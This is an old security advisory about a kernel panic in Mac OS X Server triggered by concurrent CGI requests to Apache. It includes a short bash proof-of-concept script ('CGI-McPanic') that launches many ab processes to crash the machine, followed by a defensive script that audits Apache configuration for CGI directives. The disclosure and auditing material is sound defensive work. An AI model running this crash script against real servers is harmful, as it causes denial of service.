Vulnerability

X system (cgi attack)

Affected

MacOS

Description

While doing performance tests with different web servers, ju found that MacOS X Server running apache crashed under medium load when calling CGI scripts. It displays "system panic" and a stack trace with ipc_task_init. The problem appears when 32 or more processes are doing GET requests to a CGI script in a loop. This was reproducible 100% of the time on two different G3 Macs. It doesn't matter whether the processes run locally or remotely (tried via LAN with 10 MBit). Crashes appear after 30 seconds to a couple of minutes.

It is supposed that this is a bug in the Mac kernel and *not* limited to CGI scripts; however, ju could find no other way to trigger it yet.

You can check your machine using the apache benchmark (ab, included on the MacOS X server) with the script at the end. Any other program that does HTTP requests in a loop should do.

This issue is published under:

http://www.heise.de/ct/english/99/13/186/

Script:

    #!/bin/bash
    #
    # CGI-McPanic: script to crash MacOS X with
    # concurrent calls to a CGI-Script
    #
    # before use, do:
    #
    # chmod a+x /Local/Library/WebServer/CGI-Executables/test-cgi
    #
    # then call
    #
    # bash ./CGI-McPanic
    #
    NUMPROC=32
    i=0
    while [ $i -le $NUMPROC ]
    do
        i=$[$i + 1]
        ab -t 3600 http://localhost/cgi-bin/test-cgi &
    done

Solution

Disabling CGI scripts might help for some time.
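
One way to check that the workaround under Solution is really in effect, as an added example that is not part of the original advisory: it lists the active directives in an Apache configuration that still enable CGI execution. The sample configuration is constructed (only the CGI-Executables path comes from the advisory), and the function names are hypothetical.

```shell
#!/bin/bash
# Added example: report Apache directives that still enable CGI execution.

# Constructed sample configuration, not taken from a real installation.
sample_conf() {
cat <<'EOF'
# ScriptAlias /cgi-bin/ "/old/location/"
ScriptAlias /cgi-bin/ "/Local/Library/WebServer/CGI-Executables/"
<Directory "/Local/Library/WebServer/Documents">
    Options Indexes FollowSymLinks ExecCGI
</Directory>
<Directory "/Local/Library/WebServer/Private">
    Options Indexes -ExecCGI
</Directory>
AddHandler cgi-script .cgi
EOF
}

# Print "lineno: directive" for every active (uncommented) line that enables
# CGI: ScriptAlias/ScriptAliasMatch, Options containing ExecCGI or All, or a
# handler mapped to cgi-script. Reads the named files, or stdin if none given.
cgi_enablers() {
    awk '
        { line = $0; sub(/^[ \t]+/, "", line) }
        line ~ /^#/ || line == "" { next }
        {
            n = split(line, w, /[ \t]+/)
            d = tolower(w[1]); hit = 0   # directive names are case-insensitive
            if (d == "scriptalias" || d == "scriptaliasmatch") hit = 1
            if (d == "options")
                for (i = 2; i <= n; i++) {
                    o = tolower(w[i])
                    if (o == "execcgi" || o == "+execcgi" || o == "all") hit = 1
                }
            if ((d == "addhandler" || d == "sethandler") && tolower(w[2]) == "cgi-script") hit = 1
            if (hit) print NR ": " line
        }
    ' "$@"
}

# Number of CGI-enabling directives found; 0 means none remain active.
cgi_enabler_count() { cgi_enablers "$@" | wc -l | tr -d ' '; }

# Run against the constructed sample.
sample_conf | cgi_enablers
echo "CGI-enabling directives: $(sample_conf | cgi_enabler_count)"
```

To audit a real server, pass the path of its Apache configuration file to `cgi_enablers` instead of piping in the sample.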